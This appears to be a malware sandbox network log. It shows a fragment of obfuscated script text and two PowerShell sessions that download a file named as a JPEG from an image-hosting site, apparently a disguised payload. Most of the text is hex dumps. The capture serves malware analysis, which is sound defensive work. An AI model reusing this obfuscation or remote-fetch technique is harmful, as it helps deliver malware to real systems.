2024-05-04 07:48:14 UTC	1369	IN	Data Raw: 67 54 72 65 6e 44 67 54 72 65 47 55 44 67 54 72 65 63 77 42 6a 44 67 54 72 65 48 55 44 67 54 72 65 22 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 63 75 70 61 75 72 61 6e 61 20 26 20 74 68 79 6d 61 6c 6c 6f 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 77 44 67 54 72 65 62 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 4a 77 44 67 54 72 65 73 44 67 54 72 65 43 63 44 67 54 72 65 55 67 42 6c 44 67 54 72 65 47 63 44 67 54 72 65 51 51 42 7a 44 67 54 72 65 47 30 44 67 54 72 65 4a 77 44 67 54 72 65 73 44 67 54 72 65 43 63 44 67 54 72 65 4a 77 44 67 54 72 65 70 44 67 54 72 65 43 6b 44 67 54 72 65 66 51 44 67 54 72 65 67 44 67 54 72 65 48 30 44 67 54 72 65 22 0d 0a 20 20 20 20 20 65 78 70 65 72 69 65 6e 74 65 20 3d 20 52 65 70 6c 61 63 65 28 20 65 78 Data Ascii: gTrenDgTreGUDgTrecwBjDgTreHUDgTre" & thymallo & cupaurana & thymallo & "DgTreBlDgTreGwDgTrebDgTreBhDgTreHIDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre" experiente = Replace( ex

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	104.21.45.138	443	6276	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 07:48:39 UTC	124	OUT	GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1 Host: uploaddeimagens.com.br Connection: Keep-Alive
2024-05-04 07:48:40 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 07:48:40 GMT Content-Type: image/jpeg Content-Length: 4198361 Connection: close Last-Modified: Tue, 23 Apr 2024 14:20:29 GMT ETag: "6627c3ad-400fd9" Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 2 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vGpgu9SeQ7xVN7paA5MnX9eYqQ3bqUBNQj6CjMH53yMdQPPtIgXMZvvjy2DcM%2FyVu09Ph%2Flh0XGbZxxWXzUMcfRIet9pYCd83qAXFeakGiVHtemAU3zTC5vq931ZTT9Elpzjkc9aEEql"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87e6e3c6381c08f4-LAX alt-svc: h3=":443"; ma=86400
2024-05-04 07:48:40 UTC	679	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-05-04 07:48:40 UTC	1369	IN	Data Raw: 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e Data Ascii: ccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4ApC.J
2024-05-04 07:48:40 UTC	1369	IN	Data Raw: ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56 ab 03 31 53 47 Data Ascii: y2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG
2024-05-04 07:48:40 UTC	1369	IN	Data Raw: 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19 64 e5 Data Ascii: r7qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(hd
2024-05-04 07:48:40 UTC	1369	IN	Data Raw: 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e Data Ascii: Pscb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^}E.
2024-05-04 07:48:40 UTC	1369	IN	Data Raw: 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 92 76 91 64 0a 35 Data Ascii: vOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>imvd5
2024-05-04 07:48:40 UTC	1369	IN	Data Raw: 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a 90 dd f1 0d 56 Data Ascii: {b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},zV
2024-05-04 07:48:40 UTC	1369	IN	Data Raw: 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 49 23 08 05 05 e6 Data Ascii: #MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSSI#
2024-05-04 07:48:40 UTC	1369	IN	Data Raw: d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 35 d8 60 43 Data Ascii: nq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@BH5`C
2024-05-04 07:48:40 UTC	1369	IN	Data Raw: 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16 c2 dd 7c 6b Data Ascii: 2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v\|k

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	104.21.45.138	443	6276	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 07:48:43 UTC	100	OUT	GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1 Host: uploaddeimagens.com.br
2024-05-04 07:48:43 UTC	694	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 07:48:43 GMT Content-Type: image/jpeg Content-Length: 4198361 Connection: close Last-Modified: Tue, 23 Apr 2024 14:20:29 GMT ETag: "6627c3ad-400fd9" Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 5 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CUFtqFtMIq9MkKVQfdfo2iEN7egBO3xFxFPt%2Fyc%2Forx9PqhiGhVP58Eq9FqQV3MuMGk1LBU0DEZbAU5N19NCLRuH4XqG%2F173WcQ4ZQdP%2B0KxJFet8rMKlKxa5l7qma9GJOqz7glspjJE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87e6e3dd7b8e2f56-LAX alt-svc: h3=":443"; ma=86400
2024-05-04 07:48:43 UTC	675	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-05-04 07:48:43 UTC	1369	IN	Data Raw: 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 ce 43 Data Ascii: .TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4ApC
2024-05-04 07:48:43 UTC	1369	IN	Data Raw: 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56 ab Data Ascii: %VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV
2024-05-04 07:48:43 UTC	1369	IN	Data Raw: 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e Data Ascii: Tr7qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
2024-05-04 07:48:43 UTC	1369	IN	Data Raw: f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d Data Ascii: HPscb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^}
2024-05-04 07:48:43 UTC	1369	IN	Data Raw: a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 92 76 Data Ascii: RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>imv
2024-05-04 07:48:43 UTC	1369	IN	Data Raw: 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a 90 Data Ascii: .f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},z
